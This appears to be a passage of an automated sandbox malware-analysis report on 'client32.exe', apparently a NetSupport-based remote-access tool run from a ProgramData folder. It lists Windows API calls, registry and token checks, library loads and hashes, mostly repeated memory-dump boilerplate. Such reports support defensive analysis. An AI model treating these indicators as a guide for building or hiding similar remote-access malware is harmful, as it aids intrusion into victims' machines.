                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 1314093303-0
                                                                                        • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                        • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                                        • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                        • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\x225qa0\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                        • String ID: C:\ProgramData\x225qa0\client32.exe
                                                                                        • API String ID: 2251294070-3795494224
                                                                                        • Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                                        • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                        • Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                                        • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 11110239
                                                                                          • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                          • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                          • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                        • _memset.LIBCMT ref: 11110262
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                        • String ID: ..\ctl32\Refcount.cpp
                                                                                        • API String ID: 2803934178-2363596943
                                                                                        • Opcode ID: 682feaadb0c8680301ec8f4634659c3c3f42cf446e565166f1417036573033b6
                                                                                        • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                                        • Opcode Fuzzy Hash: 682feaadb0c8680301ec8f4634659c3c3f42cf446e565166f1417036573033b6
                                                                                        • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _calloc
                                                                                        • String ID:
                                                                                        • API String ID: 1679841372-0
                                                                                        • Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                        • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                                        • Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                        • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                                        APIs
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 11116E81
                                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 11116EBE
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 11116EC5
                                                                                          • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseValue$Query
                                                                                        • String ID:
                                                                                        • API String ID: 392431914-0
                                                                                        • Opcode ID: 0c17dcaf32e79eefaf6146fad22fdca5df33e64ba1c4a8018afc1abead3a4a81
                                                                                        • Instruction ID: edf5b6ff414cef76fc351fb673ec4a61117703520949674c054a66456527b656
                                                                                        • Opcode Fuzzy Hash: 0c17dcaf32e79eefaf6146fad22fdca5df33e64ba1c4a8018afc1abead3a4a81
                                                                                        • Instruction Fuzzy Hash: 2E11DD76201128BBE700CE58DC48FEBB76C9F84B29F048228FE198A189D371A605C7B0
                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104,?), ref: 1111216A
                                                                                        • __wsplitpath.LIBCMT ref: 11112185
                                                                                          • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                                        • GetVolumeInformationA.KERNEL32 ref: 111121B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                        • String ID:
                                                                                        • API String ID: 1847508633-0
                                                                                        • Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                        • Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
                                                                                        • Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                        • Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                          • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                          • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                          • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,004DD400,004DD400,004DD400,004DD400,004DD400,004DD400,004DD400,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                          • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,004DD400,?,00000001,00000001), ref: 1109EDC3
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1109EE47
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2256153495-0
                                                                                        • Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                        • Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
                                                                                        • Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                        • Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 11069542
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: ??CTL32.DLL
                                                                                        • API String ID: 1029625771-2984404022
                                                                                        • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                        • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                                        • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                        • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                                        APIs
                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DriveType
                                                                                        • String ID: ?:\
                                                                                        • API String ID: 338552980-2533537817
                                                                                        • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                        • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                                        • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                        • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                                        APIs
                                                                                          • Part of subcall function 110ED4E0: RegCloseKey.ADVAPI32(?), ref: 110ED4ED
                                                                                        • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?), ref: 110ED53C
                                                                                          • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                        Strings
                                                                                        • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenwvsprintf
                                                                                        • String ID: Error %d Opening regkey %s
                                                                                        • API String ID: 1772833024-3994271378
                                                                                        • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                        • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                        • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                        • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(NSMTRACE), ref: 11146FF9
                                                                                          • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: HandleLibraryLoadModule
                                                                                        • String ID: NSMTRACE
                                                                                        • API String ID: 4133054770-4175627554
                                                                                        • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                        • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                                        • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                        • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll), ref: 110262C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
